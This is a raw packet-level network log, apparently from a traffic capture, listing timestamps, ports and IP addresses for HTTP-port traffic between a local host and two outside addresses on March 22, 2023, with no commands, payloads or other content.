Mar 22, 2023 05:43:35.164649963 CET	49784	80	192.168.2.5	137.118.26.67
Mar 22, 2023 05:43:35.403800964 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.403825045 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.403846025 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.403899908 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.403932095 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.403975010 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.403996944 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.403995037 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.403995037 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.404019117 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.404040098 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.404050112 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.404061079 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.404067039 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.404082060 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.404103994 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.404110909 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.404110909 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.404130936 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.404164076 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.404963017 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.404985905 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.405013084 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.405036926 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.405055046 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.405055046 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.405062914 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.405083895 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.405126095 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.405594110 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.405622959 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.405648947 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.405668020 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.405668020 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.405694962 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.407042980 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.407068968 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.407093048 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.407114029 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.407114029 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.407119989 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.407140970 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.407145023 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.407166004 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.407171965 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.407207966 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.407243967 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.408016920 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.408044100 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.408068895 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.408076048 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.408101082 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.408117056 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.408714056 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.412970066 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.425148964 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.425175905 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.425203085 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.425322056 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.425322056 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.425446987 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.425496101 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.425728083 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.425791979 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.425905943 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.426255941 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.426281929 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.426306963 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.426311970 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.426337957 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.426358938 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.427025080 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.427051067 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.427074909 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.427119017 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.427146912 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.427781105 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.427809954 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.427834988 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.428093910 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.428536892 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.428561926 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.428586006 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.428661108 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.429271936 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.429296017 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.429320097 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.429435968 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.429461002 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.430044889 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.430069923 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.430095911 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.430193901 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.430247068 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.430902958 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.430928946 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.430954933 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.431094885 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.431094885 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.431562901 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.431587934 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.431612968 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.431711912 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.431749105 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.432425022 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.432451010 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.432571888 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.432600021 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.432626009 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.433201075 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.433228016 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.433247089 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.433377028 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.433408022 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.434134960 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.434159040 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.434185028 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.434295893 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.434323072 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.434628963 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.434655905 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.434681892 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.434787035 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.435488939 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.435610056 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.435642958 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.435676098 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.435789108 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.435817003 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.436332941 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.436367035 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.436399937 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.436523914 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.436546087 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.436937094 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.436970949 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.437112093 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.437139034 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.437467098 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.437534094 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.437570095 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.437614918 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.437654972 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.438221931 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.438252926 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.438285112 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.438355923 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.438385963 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.446264029 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.446311951 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.446357965 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.446423054 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.446465015 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.446645975 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.446707010 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.446713924 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.446758986 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.446770906 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.446811914 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.447447062 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.447493076 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.447537899 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.447586060 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.447597027 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.447613955 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.447643995 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.448383093 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.448430061 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.448472023 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.448517084 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.448601961 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.448601961 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.449299097 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.449347973 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.449390888 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.449434996 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.449491024 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.450020075 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.450239897 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.450285912 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.450329065 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.450372934 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.450377941 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.450403929 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.450429916 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.451404095 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.451451063 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.451497078 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.451545000 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.451648951 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.451678991 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.452213049 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.452260017 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.452306986 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.452351093 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.452362061 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.452387094 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.452413082 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.453037977 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.453083992 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.453130007 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.453176022 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.453231096 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.453260899 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.453982115 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.454027891 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.454070091 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.454112053 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.454128981 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.454157114 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.454157114 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.455061913 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.455112934 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.455158949 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.455209017 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.455264091 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.455291033 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.455903053 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.455949068 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.456118107 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.456367016 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.456413031 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.456454039 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.456497908 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.456646919 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.456671000 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.457197905 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.457247972 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.457288980 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.457331896 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.457397938 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.457421064 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.458123922 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.458169937 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.458204985 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.458213091 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.458256960 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.458262920 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.459043980 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.459091902 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.459136009 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.459181070 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.459203005 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.459230900 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.459230900 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.460016012 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.460062981 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.460107088 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.460155010 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.460199118 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.460227013 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.460758924 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.460804939 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.460846901 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.460891962 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.460963964 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.461498022 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.461544037 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.461545944 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.461592913 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.461639881 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.461642027 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.461673021 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.461687088 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.461697102 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.462488890 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.462536097 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.462580919 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.462625027 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.462641001 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.462661982 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.462670088 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.462702990 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.462814093 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.463383913 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.463430882 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.463474035 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.463515997 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.463565111 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.463599920 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.463599920 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.463634968 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.464355946 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.464401960 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.464446068 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.464504957 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.464521885 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.465279102 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.465328932 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.465368986 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.465406895 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.465428114 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.465428114 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.465445995 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.465456963 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.465497971 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.465500116 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.465552092 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.465553999 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.465615034 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.466228008 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.466269016 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.466306925 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.466345072 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.466383934 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.466414928 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.466444016 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.466444016 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.467112064 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.467154980 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.467190981 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.467227936 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.467320919 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.467875957 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.467916012 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.467930079 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.467956066 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.467993975 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.468025923 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.468033075 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.468056917 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.468092918 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.468756914 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.468813896 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.468852997 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.468889952 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.468928099 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.468969107 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.468987942 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.469692945 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.469733000 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.469769955 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.469806910 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.469851971 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.469878912 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.469899893 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.469945908 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.469984055 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.469996929 CET	49800	80	192.168.2.5	104.26.15.53
